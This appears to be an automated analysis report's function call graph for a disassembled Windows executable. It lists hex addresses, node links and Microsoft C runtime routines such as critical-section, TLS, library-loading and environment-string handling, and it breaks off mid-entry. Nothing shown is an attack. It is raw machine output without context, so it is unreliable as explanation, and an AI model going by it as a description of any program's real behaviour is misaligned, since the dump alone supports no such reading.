__ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 5 API calls 21486 98d2e0 21485->21486 21486->21483 21490 998433 21486->21490 21487->21485 21488->21487 21489 99846e 69 API calls 21488->21489 21489->21487 21491 99843e 21490->21491 21492 998453 21490->21492 21494 996bb1 __Wcrtomb 14 API calls 21491->21494 21492->21491 21493 99845a 21492->21493 21500 996c61 21493->21500 21495 998443 21494->21495 21497 99729c __strnicoll 29 API calls 21495->21497 21499 99844e 21497->21499 21498 998469 21498->21483 21499->21483 21501 996c74 _Fputc 21500->21501 21504 996eda 21501->21504 21503 996c89 _Fputc 21503->21498 21506 996ee6 ___scrt_is_nonwritable_in_current_image 21504->21506 21505 996eec 21507 997445 _Fputc 29 API calls 21505->21507 21506->21505 21508 996f2f 21506->21508 21514 996f07 21507->21514 21515 991d4e EnterCriticalSection 21508->21515 21510 996f3b 21516 996dee 21510->21516 21512 996f51 21527 996f7a 21512->21527 21514->21503 21515->21510 21517 996e01 21516->21517 21518 996e14 21516->21518 21517->21512 21530 996d15 21518->21530 21520 996e37 21521 996ec5 21520->21521 21522 996e52 21520->21522 21534 9a197a 21520->21534 21521->21512 21524 997a7b ___scrt_uninitialize_crt 64 API calls 21522->21524 21525 996e65 21524->21525 21548 9a1760 21525->21548 21599 991d62 LeaveCriticalSection 21527->21599 21529 996f82 21529->21514 21531 996d7e 21530->21531 21532 996d26 21530->21532 21531->21520 21532->21531 21551 9a1720 21532->21551 21535 9a1d4c 21534->21535 21536 9a1d5b 21535->21536 21537 9a1d83 21535->21537 21538 997445 _Fputc 29 API calls 21536->21538 21539 99e509 _Ungetc 29 API calls 21537->21539 21547 9a1d76 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 21538->21547 21540 9a1d8c 21539->21540 21561 9a177e 21540->21561 21543 9a1e36 21564 9a19d6 21543->21564 21545 9a1e4d 21545->21547 21576 9a1b81 21545->21576 21547->21522 21549 9a18c1 _Fputc 31 API calls 21548->21549 21550 9a1779 21549->21550 21550->21521 21552 9a1734 _Fputc 21551->21552 21555 9a18c1 21552->21555 21554 9a1749 _Fputc 21554->21531 21556 9a23dd _Fputc 29 API calls 21555->21556 21557 9a18d3 21556->21557 21558 9a18ef SetFilePointerEx 21557->21558 21560 9a18db _Fputc 21557->21560 21559 9a1907 GetLastError 21558->21559 21558->21560 21559->21560 21560->21554 21583 9a179c 21561->21583 21565 9a19e5 _Fputc 21564->21565 21566 99e509 _Ungetc 29 API calls 21565->21566 21567 9a1a01 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 21566->21567 21570 9a177e 33 API calls 21567->21570 21575 9a1a0d 21567->21575 21568 98ba3f __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 5 API calls 21569 9a1b7f 21568->21569 21569->21547 21571 9a1a61 21570->21571 21572 9a1a93 ReadFile 21571->21572 21571->21575 21573 9a1aba 21572->21573 21572->21575 21574 9a177e 33 API calls 21573->21574 21574->21575 21575->21568 21577 99e509 _Ungetc 29 API calls 21576->21577 21578 9a1b94 21577->21578 21579 9a177e 33 API calls 21578->21579 21582 9a1bde __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 21578->21582 21580 9a1c3b 21579->21580 21581 9a177e 33 API calls 21580->21581 21580->21582 21581->21582 21582->21547 21584 9a17a8 ___scrt_is_nonwritable_in_current_image 21583->21584 21585 9a17eb 21584->21585 21587 9a1831 21584->21587 21593 9a1797 21584->21593 21586 997445 _Fputc 29 API calls 21585->21586 21586->21593 21594 9a2626 EnterCriticalSection 21587->21594 21589 9a1837 21590 9a1858 21589->21590 21591 9a18c1 _Fputc 31 API calls 21589->21591 21595 9a18b9 21590->21595 21591->21590 21593->21543 21593->21545 21593->21547 21594->21589 21598 9a2649 LeaveCriticalSection 21595->21598 21597 9a18bf 21597->21593 21598->21597 21599->21529 18810 98edd0 18811 98eddc ___scrt_is_nonwritable_in_current_image 18810->18811 18836 98bc28 18811->18836 18813 98ede3 18814 98ef3c 18813->18814 18824 98ee0d ___scrt_is_nonwritable_in_current_image _unexpected ___scrt_release_startup_lock 18813->18824 18887 98e42c IsProcessorFeaturePresent 18814->18887 18816 98ef43 18867 994a0a 18816->18867 18821 98ee2c 18822 98eead 18847 996f89 18822->18847 18824->18821 18824->18822 18870 994a54 18824->18870 18826 98eeb3 18851 981bf0 18826->18851 18837 98bc31 18836->18837 18894 98e094 IsProcessorFeaturePresent 18837->18894 18841 98bc42 18842 98bc46 18841->18842 18904 991caf 18841->18904 18842->18813 18845 98bc5d 18845->18813 18848 996f97 18847->18848 18849 996f92 18847->18849 18848->18826 18976 9970b2 18849->18976 18852 981c2d 18851->18852 19886 982830 18852->19886 21211 994b55 18867->21211 18871 994a6a ___scrt_is_nonwritable_in_current_image std::_Lockit::_Lockit 18870->18871 18871->18822 18872 99afb3 __Getctype 39 API calls 18871->18872 18875 99924c 18872->18875 18873 997806 CallUnexpected 39 API calls 18874 999276 18873->18874 18875->18873 18888 98e442 _unexpected std::invalid_argument::invalid_argument 18887->18888 18889 98e4ed IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 18888->18889 18890 98e531 _unexpected 18889->18890 18890->18816 18891 994a20 18892 994b55 _unexpected 21 API calls 18891->18892 18893 98ef51 18892->18893 18895 98bc3d 18894->18895 18896 98f76c 18895->18896 18913 99a9f6 18896->18913 18900 98f77d 18901 98f788 18900->18901 18927 99aa32 18900->18927 18901->18841 18903 98f775 18903->18841 18967 99d0ee 18904->18967 18907 98f78b 18908 98f79e 18907->18908 18909 98f794 18907->18909 18908->18842 18910 999acb ___vcrt_uninitialize_ptd 6 API calls 18909->18910 18911 98f799 18910->18911 18912 99aa32 ___vcrt_uninitialize_locks DeleteCriticalSection 18911->18912 18912->18908 18914 99a9ff 18913->18914 18916 99aa28 18914->18916 18917 98f771 18914->18917 18931 9a527a 18914->18931 18918 99aa32 ___vcrt_uninitialize_locks DeleteCriticalSection 18916->18918 18917->18903 18919 999a98 18917->18919 18918->18917 18948 9a518b 18919->18948 18922 999aad 18922->18900 18925 999ac8 18925->18900 18928 99aa5c 18927->18928 18929 99aa3d 18927->18929 18928->18903 18930 99aa47 DeleteCriticalSection 18929->18930 18930->18928 18930->18930 18936 9a530c 18931->18936 18934 9a52b2 InitializeCriticalSectionAndSpinCount 18935 9a529d 18934->18935 18935->18914 18937 9a532d 18936->18937 18938 9a5294 18936->18938 18937->18938 18939 9a5395 GetProcAddress 18937->18939 18941 9a5386 18937->18941 18943 9a52c1 LoadLibraryExW 18937->18943 18938->18934 18938->18935 18939->18938 18941->18939 18942 9a538e FreeLibrary 18941->18942 18942->18939 18944 9a5308 18943->18944 18945 9a52d8 GetLastError 18943->18945 18944->18937 18945->18944 18946 9a52e3 ___vcrt_FlsSetValue 18945->18946 18946->18944 18947 9a52f9 LoadLibraryExW 18946->18947 18947->18937 18949 9a530c ___vcrt_FlsSetValue 5 API calls 18948->18949 18950 9a51a5 18949->18950 18951 9a51be TlsAlloc 18950->18951 18952 999aa2 18950->18952 18952->18922 18953 9a523c 18952->18953 18954 9a530c ___vcrt_FlsSetValue 5 API calls 18953->18954 18955 9a5256 18954->18955 18956 9a5271 TlsSetValue 18955->18956 18957 999abb 18955->18957 18956->18957 18957->18925 18958 999acb 18957->18958 18959 999adb 18958->18959 18960 999ad5 18958->18960 18959->18922 18962 9a51c6 18960->18962 18963 9a530c ___vcrt_FlsSetValue 5 API calls 18962->18963 18964 9a51e0 18963->18964 18965 9a51f8 TlsFree 18964->18965 18966 9a51ec 18964->18966 18965->18966 18966->18959 18968 99d0fe 18967->18968 18969 98bc4f 18967->18969 18968->18969 18971 99c862 18968->18971 18969->18845 18969->18907 18972 99c869 18971->18972 18973 99c8ac GetStdHandle 18972->18973 18974 99c90e 18972->18974 18975 99c8bf GetFileType 18972->18975 18973->18972 18974->18968 18975->18972 18977 9970d1 18976->18977 18978 9970bb 18976->18978 18977->18848 18978->18977 18982 996ff3 18978->18982 18980 9970c8 18980->18977 18999 9971c0 18980->18999 18983 996ffc 18982->18983 18984 996fff 18982->18984 18983->18980 19008 99c925 18984->19008 18989 99701c 19041 9970de 18989->19041 18990 997010 19035 99ad27 18990->19035 18995 99ad27 ___free_lconv_mon 14 API calls 18996 997040 18995->18996 18997 99ad27 ___free_lconv_mon 14 API calls 18996->18997 18998 997046 18997->18998 18998->18980 19000 997231 18999->19000 19001 9971cf 18999->19001 19000->18977 19001->19000 19002 99c0e0 __Getctype 14 API calls 19001->19002 19003 997235 19001->19003 19004 99ae71 WideCharToMultiByte _Fputc 19001->19004 19007 99ad27 ___free_lconv_mon 14 API calls 19001->19007 19605 9a2053 19001->19605 19002->19001 19005 99ad27 ___free_lconv_mon 14 API calls 19003->19005 19004->19001 19005->19000 19007->19001 19009 997005 19008->19009 19010 99c92e 19008->19010 19014 9a1f7c GetEnvironmentStringsW 19009->19014 19063 99b06e 19010->19063 19015 9a1f94 19014->19015 19020 99700a 19014->19020 19016 99ae71 _Fputc WideCharToMultiByte 19015->19016 19017 9a1fb1 19016->19017 19018 9a1fbb FreeEnvironmentStringsW 19017->19018 19019 9a1fc6 19017->19019 19018->19020 19021 99ad61 __strnicoll 15 API calls 19019->19021 19020->18989 19020->18990 19022 9a1fcd 19021->19022 19023 9a1fe6 19022->19023 19024 9a1fd5 19022->19024 19026 99ae71 _Fputc WideCharToMultiByte 19023->19026 19025 99ad27 ___free_lconv_mon 14 API calls 19024->19025 19027 9a1fda FreeEnvironmentStringsW 19025->19027 19028 9a1ff6 19026->19028 19027->19020 19029 9a1ffd 19028->19029 19030 9a2005 19028->19030 19031 99ad27 ___free_lconv_mon 14 API calls 19029->19031 19032 99ad27 ___free_lconv_mon 14 API calls 19030->19032 19033 9a2003 FreeEnvironmentStringsW 19031->19033 19032->19033 19033->19020 19036 997016 19035->19036 19037 99ad32 RtlFreeHeap 19035->19037 19036->18980 19037->19036 19038 99ad47 GetLastError 19037->19038 19039 99ad54 __dosmaperr 19038->19039 19040 996bb1 __Wcrtomb 12 API calls 19039->19040 19040->19036 19042 9970f3 19041->19042 19043 99c0e0 __Getctype 14 API calls 19042->19043 19044 99711a 19043->19044 19045 997122 19044->19045 19055 99712c 19044->19055 19046 99ad27 ___free_lconv_mon 14 API calls 19045->19046 19047 997023 19046->19047 19047->18995 19048 997189 19049 99ad27 ___free_lconv_mon 14 API calls 19048->19049 19049->19047 19050 99c0e0 __Getctype 14 API calls 19050->19055 19051 997198 19595 997083 19051->19595 19055->19048 19055->19050 19055->19051 19056 9971b3 19055->19056 19058 99ad27 ___free_lconv_mon 14 API calls 19055->19058 19586 99a99c 19055->19586 19601 9972c9 IsProcessorFeaturePresent 19056->19601 19057 99ad27 ___free_lconv_mon 14 API calls 19060 9971a5 19057->19060 19058->19055 19061 99ad27 ___free_lconv_mon 14 API calls 19060->19061 19061->19047 19062 9971bf 19064 99b079 19063->19064 19065 99b07f 19063->19065 19110 99b9cb 19064->19110 19084 99b085 19065->19084 19115 99ba0a 19065->19115 19073 99b0b1 19075 99ba0a __Getctype 6 API calls 19073->19075 19074 99b0c6 19076 99ba0a __Getctype 6 API calls 19074->19076 19085 99b0bd 19075->19085 19077 99b0d2 19076->19077 19078 99b0e5 19077->19078 19079 99b0d6 19077->19079 19129 99b2c4 19078->19129 19082 99ba0a __Getctype 6 API calls 19079->19082 19081 99ad27 ___free_lconv_mon 14 API calls 19081->19084 19082->19085 19087 99b08a 19084->19087 19134 997806 19084->19134 19085->19081 19086 99ad27 ___free_lconv_mon 14 API calls 19086->19087 19088 99cce6 19087->19088 19089 99cd10 19088->19089 19407 99cb72 19089->19407 19094 99cd50 19421 99c96d 19094->19421 19095 99cd42 19096 99ad27 ___free_lconv_mon 14 API calls 19095->19096 19098 99cd29 19096->19098 19098->19009 19100 99cd88 19101 996bb1 __Wcrtomb 14 API calls 19100->19101 19103 99cd8d 19101->19103 19102 99cdcf 19105 99ce18 19102->19105 19432 99d0a1 19102->19432 19106 99ad27 ___free_lconv_mon 14 API calls 19103->19106 19104 99cda3 19104->19102 19107 99ad27 ___free_lconv_mon 14 API calls 19104->19107 19109 99ad27 ___free_lconv_mon 14 API calls 19105->19109 19106->19098 19107->19102 19109->19098 19145 99be0d 19110->19145 19113 99b9f0 19113->19065 19114 99ba02 TlsGetValue 19116 99be0d std::_Lockit::_Lockit 5 API calls 19115->19116 19117 99ba26 19116->19117 19118 99ba44 TlsSetValue 19117->19118 19119 99b099 19117->19119 19119->19084 19120 99c0e0 19119->19120 19121 99c0ed 19120->19121 19122 99c12d 19121->19122 19123 99c118 HeapAlloc 19121->19123 19127 99c101 __Getctype 19121->19127 19163 996bb1 19122->19163 19124 99c12b 19123->19124 19123->19127 19126 99b0a9 19124->19126 19126->19073 19126->19074 19127->19122 19127->19123 19160 994d3c 19127->19160 19200 99b42a 19129->19200 19302 99d1a5 19134->19302 19137 997816 19138 997820 IsProcessorFeaturePresent 19137->19138 19139 99783f 19137->19139 19141 99782c 19138->19141 19142 994a20 _unexpected 21 API calls 19139->19142 19332 9972fd 19141->19332 19144 997849 19142->19144 19146 99be3d 19145->19146 19149 99b9e7 19145->19149 19146->19149 19152 99bd42 19146->19152 19149->19113 19149->19114 19150 99be57 GetProcAddress 19150->19149 19151 99be67 std::_Lockit::_Lockit 19150->19151 19151->19149 19158 99bd53 ___vcrt_FlsSetValue 19152->19158 19153 99bde9 19153->19149 19153->19150 19154 99bd71 LoadLibraryExW 19155 99bd8c GetLastError 19154->19155 19156 99bdf0 19154->19156 19155->19158 19156->19153 19157 99be02 FreeLibrary 19156->19157 19157->19153 19158->19153 19158->19154 19159 99bdbf LoadLibraryExW 19158->19159 19159->19156 19159->19158 19166 994d77 19160->19166 19177 99b104 GetLastError 19163->19177 19165 996bb6 19165->19126 19167 994d83 ___scrt_is_nonwritable_in_current_image 19166->19167 19172 997594 EnterCriticalSection 19167->19172 19169 994d8e _unexpected 19173 994dc5 19169->19173 19172->19169 19176 9975ab LeaveCriticalSection 19173->19176 19175 994d47 19175->19127 19176->19175 19178 99b11a 19177->19178 19179 99b120 19177->19179 19180 99b9cb __Getctype 6 API calls 19178->19180 19181 99ba0a __Getctype 6 API calls 19179->19181 19183 99b124 SetLastError 19179->19183 19180->19179 19182 99b13c 19181->19182 19182->19183 19185 99c0e0 __Getctype 12 API calls 19182->19185 19183->19165 19186 99b151 19185->19186 19187 99b159 19186->19187 19188 99b16a 19186->19188 19190 99ba0a __Getctype 6 API calls 19187->19190 19189 99ba0a __Getctype 6 API calls 19188->19189 19191 99b176 19189->19191 19197 99b167 19190->19197 19192 99b17a 19191->19192 19193 99b191 19191->19193 19194 99ba0a __Getctype 6 API calls 19192->19194 19196 99b2c4 __Getctype 12 API calls 19193->19196 19194->19197 19195 99ad27 ___free_lconv_mon 12 API calls 19195->19183 19198 99b19c 19196->19198 19197->19195 19199 99ad27 ___free_lconv_mon 12 API calls 19198->19199 19199->19183 19201 99b436 ___scrt_is_nonwritable_in_current_image 19200->19201 19214 997594 EnterCriticalSection 19201->19214 19203 99b440 19215 99b470 19203->19215 19206 99b47c 19207 99b488 ___scrt_is_nonwritable_in_current_image 19206->19207 19219 997594 EnterCriticalSection 19207->19219 19209 99b492 19220 99b279 19209->19220 19211 99b4aa 19224 99b4ca 19211->19224 19214->19203 19218 9975ab LeaveCriticalSection 19215->19218 19217 99b332 19217->19206 19218->19217 19219->19209 19221 99b288 __Getctype 19220->19221 19223 99b2af __Getctype 19220->19223 19221->19223 19227 99f4ca 19221->19227 19223->19211 19301 9975ab LeaveCriticalSection 19224->19301 19226 99b0f0 19226->19086 19228 99f54a 19227->19228 19231 99f4e0 19227->19231 19230 99ad27 ___free_lconv_mon 14 API calls 19228->19230 19254 99f598 19228->19254 19232 99f56c 19230->19232 19231->19228 19234 99f513 19231->19234 19236 99ad27 ___free_lconv_mon 14 API calls 19231->19236 19233 99ad27 ___free_lconv_mon 14 API calls 19232->19233 19237 99f57f 19233->19237 19235 99f535 19234->19235 19242 99ad27 ___free_lconv_mon 14 API calls 19234->19242 19238 99ad27 ___free_lconv_mon 14 API calls 19235->19238 19240 99f508 19236->19240 19241 99ad27 ___free_lconv_mon 14 API calls 19237->19241 19243 99f53f 19238->19243 19239 99f606 19244 99ad27 ___free_lconv_mon 14 API calls 19239->19244 19255 99e92c 19240->19255 19246 99f58d 19241->19246 19247 99f52a 19242->19247 19248 99ad27 ___free_lconv_mon 14 API calls 19243->19248 19249 99f60c 19244->19249 19251 99ad27 ___free_lconv_mon 14 API calls 19246->19251 19283 99ec47 19247->19283 19248->19228 19249->19223 19250 99f5a6 19250->19239 19253 99ad27 14 API calls ___free_lconv_mon 19250->19253 19251->19254 19253->19250 19295 99f664 19254->19295 19256 99e93d 19255->19256 19282 99ea26 19255->19282 19257 99ad27 ___free_lconv_mon 14 API calls 19256->19257 19259 99e94e 19256->19259 19257->19259 19258 99ad27 ___free_lconv_mon 14 API calls 19260 99e960 19258->19260 19259->19258 19259->19260 19261 99ad27 ___free_lconv_mon 14 API calls 19260->19261 19262 99e972 19260->19262 19261->19262 19263 99e984 19262->19263 19264 99ad27 ___free_lconv_mon 14 API calls 19262->19264 19265 99e996 19263->19265 19266 99ad27 ___free_lconv_mon 14 API calls 19263->19266 19264->19263 19267 99e9a8 19265->19267 19268 99ad27 ___free_lconv_mon 14 API calls 19265->19268 19266->19265 19268->19267 19282->19234 19284 99ec54 19283->19284 19294 99ecac 19283->19294 19285 99ec64 19284->19285 19287 99ad27 ___free_lconv_mon 14 API calls 19284->19287 19286 99ec76 19285->19286 19288 99ad27 ___free_lconv_mon 14 API calls 19285->19288 19289 99ad27 ___free_lconv_mon 14 API calls 19286->19289 19291 99ec88 19286->19291 19287->19285 19288->19286 19289->19291 19290 99ec9a 19290->19294 19291->19290 19292 99ad27 ___free_lconv_mon 14 API calls 19291->19292 19292->19290 19294->19235 19296 99f671 19295->19296 19297 99f690 19295->19297 19296->19297 19298 99ed2b __Getctype 14 API calls 19296->19298 19297->19250 19299 99f68a 19298->19299 19300 99ad27 ___free_lconv_mon 14 API calls 19299->19300 19300->19297 19301->19226 19338 99d428 19302->19338 19305 99d1cc 19308 99d1d8 ___scrt_is_nonwritable_in_current_image 19305->19308 19306 99b104 __dosmaperr 14 API calls 19315 99d209 _unexpected 19306->19315 19307 99d228 19311 996bb1 __Wcrtomb 14 API calls 19307->19311 19308->19306 19308->19307 19309 99d23a _unexpected 19308->19309 19308->19315 19312 99d270 _unexpected 19309->19312 19352 997594 EnterCriticalSection 19309->19352 19310 99d212 19310->19137 19313 99d22d 19311->19313 19318 99d3aa 19312->19318 19319 99d2ad 19312->19319 19330 99d2db 19312->19330 19349 99729c 19313->19349 19315->19307 19315->19309 19315->19310 19320 99d3b5 19318->19320 19384 9975ab LeaveCriticalSection 19318->19384 19319->19330 19353 99afb3 GetLastError 19319->19353 19323 994a20 _unexpected 21 API calls 19320->19323 19326 99d3bd 19323->19326 19324 99d330 19324->19310 19331 99afb3 __Getctype 39 API calls 19324->19331 19327 99afb3 __Getctype 39 API calls 19327->19324 19329 99afb3 __Getctype 39 API calls 19329->19330 19380 99d356 19330->19380 19331->19310 19333 997319 _unexpected std::invalid_argument::invalid_argument 19332->19333 19334 997345 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 19333->19334 19335 997416 _unexpected 19334->19335 19399 98ba3f 19335->19399 19337 997434 19337->19139 19339 99d434 ___scrt_is_nonwritable_in_current_image 19338->19339 19344 997594 EnterCriticalSection 19339->19344 19341 99d442 19345 99d484 19341->19345 19344->19341 19348 9975ab LeaveCriticalSection 19345->19348 19347 99780b 19347->19137 19347->19305 19348->19347 19385 9974eb 19349->19385 19351 9972a8 19351->19310 19352->19312 19354 99afc9 19353->19354 19358 99afcf 19353->19358 19356 99b9cb __Getctype 6 API calls 19354->19356 19355 99ba0a __Getctype 6 API calls 19357 99afeb 19355->19357 19356->19358 19360 99c0e0 __Getctype 14 API calls 19357->19360 19377 99afd3 SetLastError 19357->19377 19358->19355 19358->19377 19361 99b000 19360->19361 19364 99b019 19361->19364 19365 99b008 19361->19365 19362 99b068 19366 997806 CallUnexpected 37 API calls 19362->19366 19363 99b063 19363->19329 19368 99ba0a __Getctype 6 API calls 19364->19368 19367 99ba0a __Getctype 6 API calls 19365->19367 19369 99b06d 19366->19369 19370 99b016 19367->19370 19371 99b025 19368->19371 19374 99ad27 ___free_lconv_mon 14 API calls 19370->19374 19372 99b029 19371->19372 19373 99b040 19371->19373 19376 99ba0a __Getctype 6 API calls 19372->19376 19375 99b2c4 __Getctype 14 API calls 19373->19375 19374->19377 19378 99b04b 19375->19378 19376->19370 19377->19362 19377->19363 19379 99ad27 ___free_lconv_mon 14 API calls 19378->19379 19379->19377 19381 99d35a 19380->19381 19382 99d322 19380->19382 19398 9975ab LeaveCriticalSection 19381->19398 19382->19310 19382->19324 19382->19327 19384->19320 19386 9974fd _Fputc 19385->19386 19389 997445 19386->19389 19388 997515 _Fputc 19388->19351 19390 997455 19389->19390 19392 99745c 19389->19392 19391 992240 _Fputc 16 API calls 19390->19391 19391->19392 19393 9974c2 _Fputc GetLastError SetLastError 19392->19393 19397 99746a 19392->19397 19394 997491 19393->19394 19395 9972c9 __Getctype 11 API calls 19394->19395 19394->19397 19396 9974c1 19395->19396 19397->19388 19398->19382 19400 98ba48 IsProcessorFeaturePresent 19399->19400 19401 98ba47 19399->19401 19403 98df86 19400->19403 19401->19337 19406 98e06c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 19403->19406 19405 98e069 19405->19337 19406->19405 19440 99142a 19407->19440 19410 99cb93 GetOEMCP 19413 99cbbc 19410->19413 19411 99cba5 19412 99cbaa GetACP 19411->19412 19411->19413 19412->19413 19413->19098 19414 99ad61 19413->19414 19415 99ad9f 19414->19415 19419 99ad6f __Getctype 19414->19419 19416 996bb1 __Wcrtomb 14 API calls 19415->19416 19418 99ad9d 19416->19418 19417 99ad8a RtlAllocateHeap 19417->19418 19417->19419 19418->19094 19418->19095 19419->19415 19419->19417 19420 994d3c std::ios_base::_Init 2 API calls 19419->19420 19420->19419 19422 99cb72 41 API calls 19421->19422 19424 99c98d 19422->19424 19423 99ca92 19425 98ba3f __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 5 API calls 19423->19425 19424->19423 19426 99c9ca IsValidCodePage 19424->19426 19431 99c9e5 std::invalid_argument::invalid_argument 19424->19431 19427 99cb70 19425->19427 19426->19423 19428 99c9dc 19426->19428 19427->19100 19427->19104 19429 99ca05 GetCPInfo 19428->19429 19428->19431 19429->19423 19429->19431 19480 99cefc 19431->19480 19433 99d0ad ___scrt_is_nonwritable_in_current_image 19432->19433 19560 997594 EnterCriticalSection 19433->19560 19435 99d0b7 19561 99ce3b 19435->19561 19441 991448 19440->19441 19442 991441 19440->19442 19441->19442 19443 99afb3 __Getctype 39 API calls 19441->19443 19442->19410 19442->19411 19444 991469 19443->19444 19448 99b596 19444->19448 19449 99b5a9 19448->19449 19450 99147f 19448->19450 19449->19450 19456 99f695 19449->19456 19452 99b5c3 19450->19452 19453 99b5d6 19452->19453 19455 99b5eb 19452->19455 19453->19455 19477 99c912 19453->19477 19455->19442 19457 99f6a1 ___scrt_is_nonwritable_in_current_image 19456->19457 19458 99afb3 __Getctype 39 API calls 19457->19458 19459 99f6aa 19458->19459 19460 99f6f0 19459->19460 19469 997594 EnterCriticalSection 19459->19469 19460->19450 19462 99f6c8 19470 99f716 19462->19470 19467 997806 CallUnexpected 39 API calls 19468 99f715 19467->19468 19469->19462 19471 99f6d9 19470->19471 19472 99f724 __Getctype 19470->19472 19474 99f6f5 19471->19474 19472->19471 19473 99f4ca __Getctype 14 API calls 19472->19473 19473->19471 19475 9975ab std::_Lockit::~_Lockit LeaveCriticalSection 19474->19475 19476 99f6ec 19475->19476 19476->19460 19476->19467 19478 99afb3 __Getctype 39 API calls 19477->19478 19479 99c917 19478->19479 19479->19455 19481 99cf24 GetCPInfo 19480->19481 19490 99cfed 19480->19490 19486 99cf3c 19481->19486 19481->19490 19482 98ba3f __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 5 API calls 19484 99d09f 19482->19484 19484->19423 19491 99c3cc 19486->19491 19490->19482 19492 99142a __strnicoll 39 API calls 19491->19492 19493 99c3ec 19492->19493 19511 99adaf 19493->19511 19495 99c4a8 19497 98ba3f __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 5 API calls 19495->19497 19496 99c4a0 19514 98ea27 19496->19514 19500 99c4cb 19497->19500 19498 99c419 19498->19495 19498->19496 19499 99ad61 __strnicoll 15 API calls 19498->19499 19502 99c43e std::invalid_argument::invalid_argument __alloca_probe_16 19498->19502 19499->19502 19506 99c4cd 19500->19506 19502->19496 19503 99adaf __strnicoll MultiByteToWideChar 19502->19503 19504 99c487 19503->19504 19504->19496 19505 99c48e GetStringTypeW 19504->19505 19505->19496 19507 99142a __strnicoll 39 API calls 19506->19507 19508 99c4e0 19507->19508 19523 99c516 19508->19523 19518 99add9 19511->19518 19515 98ea31 19514->19515 19516 98ea42 19514->19516 19515->19516 19520 99831e 19515->19520 19516->19495 19519 99adcb MultiByteToWideChar 19518->19519 19519->19498 19521 99ad27 ___free_lconv_mon 14 API calls 19520->19521 19522 998336 19521->19522 19522->19516 19524 99c531 __strnicoll 19523->19524 19525 99adaf __strnicoll MultiByteToWideChar 19524->19525 19529 99c575 19525->19529 19526 99c6f0 19529->19526 19560->19435 19571 998d0b 19561->19571 19563 99ce5d 19564 998d0b 29 API calls 19563->19564 19565 99ce7c 19564->19565 19566 99cea3 19565->19566 19567 99ad27 ___free_lconv_mon 14 API calls 19565->19567 19568 99d0e2 19566->19568 19567->19566 19585 9975ab LeaveCriticalSection 19568->19585 19570 99d0d0 19570->19105 19572 998d1c 19571->19572 19575 998d18 codecvt 19571->19575 19573 998d23 19572->19573 19578 998d36 std::invalid_argument::invalid_argument 19572->19578 19574 996bb1 __Wcrtomb 14 API calls 19573->19574 19576 998d28 19574->19576 19575->19563 19577 99729c __strnicoll 29 API calls 19576->19577 19577->19575 19578->19575 19579 998d6d 19578->19579 19580 998d64 19578->19580 19579->19575 19582 996bb1 __Wcrtomb 14 API calls 19579->19582 19581 996bb1 __Wcrtomb 14 API calls 19580->19581 19583 998d69 19581->19583 19582->19583 19584 99729c __strnicoll 29 API calls 19583->19584 19584->19575 19585->19570 19587 99a9b8 19586->19587 19588 99a9aa 19586->19588 19589 996bb1 __Wcrtomb 14 API calls 19587->19589 19588->19587 19590 99a9d0 19588->19590 19594 99a9c0 19589->19594 19592 99a9ca 19590->19592 19593 996bb1 __Wcrtomb 14 API calls 19590->19593 19591 99729c __strnicoll 29 API calls 19591->19592 19592->19055 19593->19594 19594->19591 19599 997090 19595->19599 19600 9970ad 19595->19600 19596 9970a7 19598 99ad27 ___free_lconv_mon 14 API calls 19596->19598 19597 99ad27 ___free_lconv_mon 14 API calls 19597->19599 19598->19600 19599->19596 19599->19597 19600->19057 19602 9972d5 19601->19602 19603 9972fd _unexpected 8 API calls 19602->19603 19604 9972ea GetCurrentProcess TerminateProcess 19603->19604 19604->19062 19606 9a205e 19605->19606 19607 9a206f 19606->19607 19610 9a2082 ___from_strstr_to_strchr 19606->19610 19608 996bb1 __Wcrtomb 14 API calls 19607->19608 19609 9a2074 19608->19609 19609->19001 19611 9a2299 19610->19611 19612 9a20a2 19610->19612 19613 996bb1 __Wcrtomb 14 API calls 19611->19613 19668 9a22be 19612->19668 19615 9a229e 19613->19615 19617 99ad27 ___free_lconv_mon 14 API calls 19615->19617 19617->19609 19618 9a20e8 19622 99c0e0 __Getctype 14 API calls 19618->19622 19633 9a20d2 19618->19633 19620 9a20c4 19627 9a20cd 19620->19627 19628 9a20e1 19620->19628 19624 9a20f6 19622->19624 19623 99ad27 ___free_lconv_mon 14 API calls 19623->19609 19626 99ad27 ___free_lconv_mon 14 API calls 19624->19626 19625 9a215b 19630 99ad27 ___free_lconv_mon 14 API calls 19625->19630 19636 9a2101 19626->19636 19631 996bb1 __Wcrtomb 14 API calls 19627->19631 19629 9a22be 39 API calls 19628->19629 19647 9a20e6 19629->19647 19635 9a2163 19630->19635 19631->19633 19632 9a21a6 19632->19633 19634 9a1673 std::ios_base::_Init 32 API calls 19632->19634 19633->19623 19637 9a21d4 19634->19637 19644 9a2190 19635->19644 19676 9a1673 19635->19676 19636->19633 19638 99c0e0 __Getctype 14 API calls 19636->19638 19636->19647 19639 99ad27 ___free_lconv_mon 14 API calls 19637->19639 19641 9a211d 19638->19641 19639->19644 19640 9a228e 19642 99ad27 ___free_lconv_mon 14 API calls 19640->19642 19645 99ad27 ___free_lconv_mon 14 API calls 19641->19645 19642->19609 19644->19633 19644->19640 19644->19644 19649 99c0e0 __Getctype 14 API calls 19644->19649 19645->19647 19646 9a2187 19648 99ad27 ___free_lconv_mon 14 API calls 19646->19648 19647->19633 19672 9a22d8 19647->19672 19648->19644 19650 9a221f 19649->19650 19651 9a222f 19650->19651 19652 9a2227 19650->19652 19654 99a99c ___std_exception_copy 29 API 